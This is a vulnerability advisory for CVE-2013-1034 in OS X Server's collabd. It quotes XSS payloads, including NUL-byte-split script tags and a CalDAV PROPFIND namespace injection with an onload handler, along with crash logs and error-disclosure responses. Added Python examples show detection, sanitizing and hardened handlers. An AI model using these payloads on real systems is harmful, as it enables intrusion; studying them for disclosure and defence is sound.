CVE-2013-1034, Stored XSS, XXE, OS X Server v2.2.1, APPLE-SA-2013-09-17-1, HTML Injection, JSON XSS, Stored DOM XSS, SQL Injection

CVE-2013-1034 Summary

CVE-2013-1034, Security, Cross-Site Scripting, Private Bug Report, Apple, Stored JSON XSS, APPLE-SA-2013-09-17-1, CWE-79, CAPEC-86, CWE-611, Mountain Lion, OS X Version 2.2.1, DoS, Crash, SQL Injection, Blind SQL Injection, Ruby, XML External Entity Injection, CAPEC-66, Colladb

Last Updated 18/9/2013 @ 1800 GMT

APPLE-SA-2013-09-17-1 was released on September 17, 2013 to address multiple bugs in collabd, the collaboration service in OS X Server 2.2.1 (163), reported to Apple Product Security on April 17, 2013.

Keywords
CVE-2013-1034, Cross-Site Scripting, Apple, APPLE-SA-2013-09-17-1, CWE-79, CAPEC-86, CWE-611, OS X Server 2.2.1, DoS, Crash, CAPEC-66, collabd, Ruby on Rails, PostgreSQL

Impact
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification

Vulnerable Software Version & Upgrade Information
The vulnerable platform is OS X Server 2.2.1. The current release is OS X Server 2.2.2: open the App Store application in OS X and click Update.

Additionally, the same update addresses multiple vulnerabilities in PostgreSQL, the most serious of which may lead to data corruption and/or privilege escalation.

Crash Info:
Vanilla test case: 1) the signature is injected into the web application, 2) collabd does an INSERT, 3) the NUL bytes in the value crash collabd 4) when it queries for a UUID. Note the difference between the expression that crashes the app and a valid query. In the crash report below, the crashed thread faults on its stack guard page (EXC_BAD_ACCESS, KERN_PROTECTION_FAILURE) inside repeated -[CSJSONEncoder sanitizeObject:] frames, i.e. the JSON encoder recursed until the thread ran out of stack.

Log Files:
server.local collabd: [CSODService] No user records returned for query [<s[NULL]cript>confirm(9)</s[NULL]cript>'>Click for XSS</a>]
……..
server.local collabd: [PGCConnection: Error in TXN: Error executing query [INSERT INTO entity (is_deleted, long_name, is_blog_enabled, description, container_uid_fk, create_time, updatedby_user_fk, revision, short_name, theme_info, owner_entity_type_fk, ownedby_uid_fk, entity_type_fk, createdby_user_fk, is_hidden, uid, blog_uid_fk, tiny_id, parent_uids, update_time, avatar_uid_fk, is_perm_deleted) VALUES (DEFAULT, $1, DEFAULT, $2, DEFAULT, DEFAULT, $3, DEFAULT, $4, DEFAULT, DEFAULT, $5, $6, $7, DEFAULT, $8, $9, $10, DEFAULT, DEFAULT, DEFAULT, DEFAULT)]: ERROR:  invalid input syntax for uuid: "<s[NULL]cript>confirm(9)</s[NULL]cript>"
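To turn the two log entries above into a detection, here is an added Python example (mine, not the page's or Apple's code) that scans collabd log lines for the PostgreSQL uuid cast failure and the CSODService lookup message, pulls out the rejected value, and labels it by what it contains. The sample lines are constructed to match the entries quoted above (the INSERT column list is shortened and "[NULL]" is kept as the placeholder the quoted log uses for an embedded NUL byte); the 0x0x0x and canonical-uuid lines are added for contrast and are not from the page.

```python
import re

# Constructed log lines modelled on the collabd entries quoted above.
LOG_LINES = [
    "server.local collabd: [CSODService] No user records returned for query "
    "[<s[NULL]cript>confirm(9)</s[NULL]cript>'>Click for XSS</a>]",
    "server.local collabd: [PGCConnection: Error in TXN: Error executing query "
    "[INSERT INTO entity (short_name, uid) VALUES ($1, $2)]: ERROR:  invalid input "
    'syntax for uuid: "<s[NULL]cript>confirm(9)</s[NULL]cript>"',
    "server.local collabd: [PGCConnection: Error in TXN: Error executing query "
    "[SELECT count(entity_uid_fk) FROM filedata_entity WHERE entity_uid_fk = $1]: "
    'ERROR:  invalid input syntax for uuid: "0x0x0x"',
    "server.local collabd: [CSODService] No user records returned for query "
    "[6b8b4567-327b-4d2a-9c7e-1a2b3c4d5e6f]",
]

# The value PostgreSQL refused to cast, and the value CSODService looked up.
PG_UUID_ERR = re.compile(r'invalid input syntax for uuid: "(?P<value>.*)"\s*$')
CSOD_QUERY = re.compile(
    r'\[CSODService\] No user records returned for query \[(?P<value>.*)\]\s*$')
CANONICAL_UUID = re.compile(r'^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$')


def classify(value):
    """Label a value that collabd failed to handle as a uuid."""
    if "[NULL]" in value or "\x00" in value:
        return "nul-byte"        # the filter-evasion pattern seen on this page
    if re.search(r"[<>'\"]", value):
        return "markup"          # tag or quote characters: XSS / SQLi probing
    if CANONICAL_UUID.match(value):
        return "uuid"            # well-formed identifier, nothing to flag
    return "malformed"           # garbage, but not obviously an attack


def scan(lines):
    """Return one finding per line carrying a non-uuid value; lines whose
    value is a canonical uuid are dropped as benign."""
    findings = []
    for line in lines:
        m = PG_UUID_ERR.search(line) or CSOD_QUERY.search(line)
        if not m:
            continue
        value = m.group("value")
        label = classify(value)
        if label == "uuid":
            continue
        source = "postgres" if "PGCConnection" in line else "csod"
        findings.append({"source": source, "label": label, "value": value})
    return findings


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
```

The CSODService message is the earlier signal of the two: it records the value before the INSERT that trips the uuid cast, so alerting on it catches the probe even when the database error is swallowed.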

===============
STACK GUARD OUTPUT
===============

Process:         collabd [45073]
Path:            /Applications/Server.app/Contents/ServerRoot/usr/sbin/collabd
Identifier:      collabd
Version:         238.17
Code Type:       X86-64 (Native)

Date/Time:       2013-04-17
OS Version:      Mac OS X 10.8.3 (12D78)
Report Version:  10

Crashed Thread:  4  ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00000001103e1fc8

VM Regions Near 0x1103e1fc8:
    Stack                  000000011035f000-00000001103e1000 [  520K] rw-/rwx SM=COW  thread 8
--> STACK GUARD            00000001103e1000-00000001103e2000 [    4K] ---/rwx SM=NUL  stack guard for thread 4
    Stack                  00000001103e2000-0000000110464000 [  520K] rw-/rwx SM=COW  thread 4

Thread 0:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.CoreFoundation       0x00007fff88930dd1 CFRunLoopRun + 97
6   collabd                       0x000000010e8a4e39 main + 1316
7   libdyld.dylib                 0x00007fff813317e1 start + 1

Thread 1:: Dispatch queue: com.apple.libdispatch-manager
0   libsystem_kernel.dylib         0x00007fff86a86d16 kevent + 10
1   libdispatch.dylib             0x00007fff85e01dea _dispatch_mgr_invoke + 883
2   libdispatch.dylib             0x00007fff85e019ee _dispatch_mgr_thread + 54

Thread 2:: com.apple.NSURLConnectionLoader
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.Foundation           0x00007fff88ceab66 +[NSURLConnection(Loader) _resourceLoadLoop:] + 356
6   com.apple.Foundation           0x00007fff88d48cd2 __NSThread__main__ + 1345
7   libsystem_c.dylib             0x00007fff8610a7a2 _pthread_start + 327
8   libsystem_c.dylib             0x00007fff860f71e1 thread_start + 13

Thread 3:: com.apple.CFSocket.private
0   libsystem_kernel.dylib         0x00007fff86a86322 __select + 10
1   com.apple.CoreFoundation       0x00007fff88961f46 __CFSocketManager + 1302
2   libsystem_c.dylib             0x00007fff8610a7a2 _pthread_start + 327
3   libsystem_c.dylib             0x00007fff860f71e1 thread_start + 13

Thread 4 Crashed:: ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority
0   com.apple.CSService           0x000000010e93c137 -[CSJSONEncoder sanitizeObject:] + 20
1   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
2   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
3   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
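The crashed thread above is -[CSJSONEncoder sanitizeObject:] calling itself until the thread's stack reaches its guard page. The following Python sketch, added here and not collabd's code, is a recursive sanitizer of the same shape that (a) strips the NUL bytes the page's payload uses to split "script" before escaping markup, and (b) refuses input nested deeper than a fixed bound, so pathological input yields a handled error instead of a stack fault. The depth limit and the nested test input are assumptions; the page does not say what nesting, if any, collabd received.

```python
import html

MAX_DEPTH = 32   # assumed bound; size it to the deepest document the API needs


def sanitize_string(s):
    """Drop NUL bytes first, then HTML-escape, so "<s\\x00cript>" cannot be
    reassembled into "<script>" by a consumer that ignores NULs."""
    return html.escape(s.replace("\x00", ""), quote=True)


def sanitize_object(obj, depth=0, max_depth=MAX_DEPTH):
    """Recursively sanitize the strings inside dict/list JSON values, with an
    explicit depth bound (the check the crashed encoder had no equivalent of)."""
    if depth > max_depth:
        raise ValueError("object nested deeper than %d levels" % max_depth)
    if isinstance(obj, str):
        return sanitize_string(obj)
    if isinstance(obj, dict):
        return {sanitize_string(str(k)): sanitize_object(v, depth + 1, max_depth)
                for k, v in obj.items()}
    if isinstance(obj, (list, tuple)):
        return [sanitize_object(v, depth + 1, max_depth) for v in obj]
    return obj   # numbers, booleans and None pass through unchanged


def sanitize_object_unbounded(obj):
    """The same walk with no bound: on CPython this dies with RecursionError
    at the interpreter's frame limit, the analogue of the guard-page fault."""
    if isinstance(obj, str):
        return sanitize_string(obj)
    if isinstance(obj, dict):
        return {k: sanitize_object_unbounded(v) for k, v in obj.items()}
    if isinstance(obj, (list, tuple)):
        return [sanitize_object_unbounded(v) for v in obj]
    return obj


def nested(depth, leaf="x"):
    """Build a list nested `depth` levels deep without recursion (constructed input)."""
    obj = leaf
    for _ in range(depth):
        obj = [obj]
    return obj


def encode_safely(obj):
    """Return (ok, result): the sanitized object, or an error message the
    caller can turn into a 4xx response rather than a crashed service."""
    try:
        return True, sanitize_object(obj)
    except ValueError as exc:
        return False, str(exc)
```

The order inside sanitize_string matters: escaping first and stripping NULs afterwards would leave "<s\x00cript>" looking harmless to the escaper and then collapse it into a live tag.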

XSS PoC
PROPFIND /calendars/__uids__/{…}/ HTTP/1.1
Host: server.local
…[SNIP]…
Inject Signature: w3.org/1999/xhtml&apos;&gt;&lt;a:body onload=&apos;alert(1)&apos;/&gt;&lt;/a&gt;" xmlns:I="http://apple.com/ns/ical/" xmlns:CS="http://calendarserver.org/ns/"><D:prop><D:displayname/><D:resourcetype/><D:current-user-privilege-set/><I:calendar-color/>
…[SNIP]…

Response Fingerprint

…[SNIP]…
<schedule-default-calendar-URL xmlns='urn:ietf:params:xml:ns:caldav<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>'/>
…[SNIP]…
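The request and response above show the mechanism: the client declares a CalDAV namespace whose URI carries entity-encoded markup, the server's XML parser decodes it, and the server then writes that namespace URI back into a quoted attribute with no escaping. The following added Python example (mine, not Apple's code) reproduces the decoded value and the exact response fingerprint, then shows the two fixes: escape the attribute value, or better, never reflect a client-supplied namespace for a property the server defines itself. The PROPFIND body is constructed in the shape of the PoC and is not the page's full request.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

CALDAV_NS = "urn:ietf:params:xml:ns:caldav"
TARGET = "schedule-default-calendar-URL"

# Constructed PROPFIND body: the CalDAV namespace declaration carries
# entity-encoded markup, which the parser decodes before the application
# ever sees the namespace URI.
PROPFIND_BODY = (
    '<D:propfind xmlns:D="DAV:" '
    'xmlns:C="urn:ietf:params:xml:ns:caldav&lt;a xmlns:a=&apos;http://www.w3.org/1999/xhtml&apos;&gt;'
    '&lt;a:body onload=&apos;alert(1)&apos;/&gt;&lt;/a&gt;" '
    'xmlns:I="http://apple.com/ns/ical/">'
    '<D:prop><D:displayname/><C:schedule-default-calendar-URL/></D:prop>'
    '</D:propfind>'
)


def requested_namespace(body, local_name=TARGET):
    """Return the namespace URI the client bound to the requested property,
    exactly as the parser hands it to the application (entities decoded)."""
    root = ET.fromstring(body)
    for el in root.iter():
        if el.tag.startswith("{") and el.tag.endswith("}" + local_name):
            return el.tag[1:el.tag.index("}")]
    return None


def render_unsafe(ns_uri):
    """Echo the client's URI into a quoted attribute by string formatting.
    This reproduces the response fingerprint quoted above byte for byte."""
    return "<%s xmlns='%s'/>" % (TARGET, ns_uri)


def render_escaped(ns_uri):
    """Same reflection, but the attribute value is XML-escaped: the markup
    survives as text and can no longer open an element."""
    return "<%s xmlns=%s/>" % (TARGET, quoteattr(ns_uri))


def render_strict(ns_uri):
    """Preferred fix: the property is defined in the CalDAV namespace, so
    require exactly that and never reflect what the client sent."""
    if ns_uri != CALDAV_NS:
        raise ValueError("property %s is not defined in namespace %r" % (TARGET, ns_uri))
    return "<%s xmlns=%s/>" % (TARGET, quoteattr(CALDAV_NS))


def is_well_formed(xml_text):
    """True if an XML parser accepts the text at all."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def parsed_namespace(xml_text):
    """Namespace URI the parser assigns to the root element of xml_text."""
    tag = ET.fromstring(xml_text).tag
    return tag[1:tag.index("}")] if tag.startswith("{") else ""
```

The escaped variant is enough to stop the injection, but it still round-trips attacker data into every client that reads the property; the strict variant also removes the reflection, which is what a namespace-qualified property should have been doing anyway.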

SQL Injection Info
Here is an example response. Note what it shows: the logged statements bind the supplied value as a positional parameter ($1), so the PostgreSQL error is the uuid cast rejecting the string rather than injected SQL syntax being executed. What the response does demonstrate is the disclosure: a raw PostgreSQL error with the query text, an Objective-C backtrace and the server banner are returned to the client as a 500, where a malformed identifier should have produced a generic 400.
…[SNIP]…

HTTP/1.1 500 Internal Server Error
…[SNIP]…
Server Fingerprint: "Server: thin 1.3.1 codename Triple Espresso"
…[SNIP]…
Caught exception "Error executing query [SELECT count(entity_uid_fk) FROM filedata_entity WHERE entity_uid_fk = $1]: ERROR: invalid input syntax for uuid: "{PoC}"
" [PGCQueryError] executing route {PoC}:
(
   0 CoreFoundation 0x00007fff8d36ab06 __exceptionPreprocess + 198
   1 libobjc.A.dylib 0x00007fff89b663f0 objc_exception_throw + 43
   2 PostgreSQLClient 
…[SNIP]…
{
"succeeded" : false,
"response" : {
"exceptionString" : "Error executing query [SELECT array_agg(group_id) FROM groups WHERE 'group:'||group_id IN (SELECT external_id 
…[SNIP]…
R JOIN entity ON (entity.uid=ANY($1)) WHERE entity_uid_fk=ANY(entity.parent_uids::uuid[]))]: ERROR: invalid input syntax for uuid: \"{PoC}\"\n",
"exceptionName" : "PGCQueryError"
},
"type" : "com.apple.ServiceResponse",
"referencedObjects" : [
],
"responseStatus" : "failed"

}

…[SNIP]…
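As an added example (mine, not collabd's code), the following Python contrasts a handler that forwards the driver error to the client, in the shape of the com.apple.ServiceResponse above, with one that validates the identifier as a UUID before any query runs and returns a generic 400. The database call is emulated in-process with constructed rows: because the value is a bound parameter it is never spliced into the SQL text, but PostgreSQL's uuid cast still rejects anything that is not a UUID, which is the error the page shows. The sample UUID, row counts and envelope field names other than those visible above are assumptions.

```python
import uuid


class PGCQueryError(Exception):
    """Stand-in for the PostgreSQL client exception named in the response above."""


# Constructed sample rows, keyed by canonical uuid text (not data from the page).
FILEDATA_ROWS = {
    "6b8b4567-327b-4d2a-9c7e-1a2b3c4d5e6f": 3,
}

FILEDATA_COUNT_SQL = ("SELECT count(entity_uid_fk) FROM filedata_entity "
                      "WHERE entity_uid_fk = $1")


def pg_count_filedata(entity_uid):
    """Emulates the bound-parameter query: quotes and keywords in the value
    are inert, but the server-side cast to uuid fails for non-UUID input."""
    try:
        key = str(uuid.UUID(str(entity_uid)))
    except ValueError:
        raise PGCQueryError('Error executing query [%s]: ERROR: invalid input '
                            'syntax for uuid: "%s"' % (FILEDATA_COUNT_SQL, entity_uid))
    return FILEDATA_ROWS.get(key, 0)


def leaky_handler(value):
    """The failure mode on the page: the raw driver error reaches the client."""
    try:
        count = pg_count_filedata(value)
    except PGCQueryError as exc:
        return 500, {"succeeded": False, "responseStatus": "failed",
                     "type": "com.apple.ServiceResponse",
                     "response": {"exceptionName": "PGCQueryError",
                                  "exceptionString": str(exc)}}
    return 200, {"succeeded": True, "responseStatus": "ok",
                 "type": "com.apple.ServiceResponse", "response": {"count": count}}


def hardened_handler(value, audit_log):
    """Validate and canonicalize the identifier before it reaches the
    database, and keep driver errors server-side (audit_log is any list)."""
    try:
        entity_uid = str(uuid.UUID(str(value)))
    except ValueError:
        audit_log.append("rejected entity id %r" % (value,))
        return 400, {"succeeded": False, "responseStatus": "failed",
                     "type": "com.apple.ServiceResponse",
                     "response": {"error": "invalid entity identifier"}}
    try:
        count = pg_count_filedata(entity_uid)
    except PGCQueryError as exc:
        audit_log.append(str(exc))      # query text and PG error stay in the log
        return 500, {"succeeded": False, "responseStatus": "failed",
                     "type": "com.apple.ServiceResponse",
                     "response": {"error": "internal error"}}
    return 200, {"succeeded": True, "responseStatus": "ok",
                 "type": "com.apple.ServiceResponse", "response": {"count": count}}
```

uuid.UUID accepts braces, upper case and the urn:uuid: prefix and normalizes them, so the hardened handler also gives the database one canonical form instead of whatever spelling the client chose.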

Data Mining
JS Sources: /__wiki/coreclient/javascripts/sprockets.js + CalAccess, CalDev and other Files
JS Sinks: collabdproxy + devicemanagement/console/sproutcore/en/{…}/javascript-packed.js
Rails.root: /Applications/Server.app/Contents/ServerRoot/usr/share/collabd/coreclient

Rails Note
Rails is bundled with OS X Server 2.2.2
Rails may only be accessible at certain routes, such as /wiki or /calendar.
Server Fingerprint: “Server: thin 1.3.1 codename Triple Espresso”

Knowledgebase
Felix Wilhelm: Analysis of Rails XML Parameter Parsing Vulnerability
HD Moore: Serialization Mischief in Ruby Land
Google Groups: Multiple vulnerabilities in parameter parsing in Action Pack (CVE-2013-0156)
Google Groups: SQL Injection Vulnerability in Ruby on Rails (CVE-2012-5664)

External Links

APPLE-SA-2013-09-17-1, CVE-2013-1034, SA54891, CERTA-2013-AVI-532, CB-K13-0666

Responsible Disclosure

XSS, Javascript Injection, Hoyt LLC Research, CWE-79, CAPEC-66, SQL Injection

When you find a Bug or Exploitable Issue in an Apple Product or Service, file a Private Report with Apple Product Security.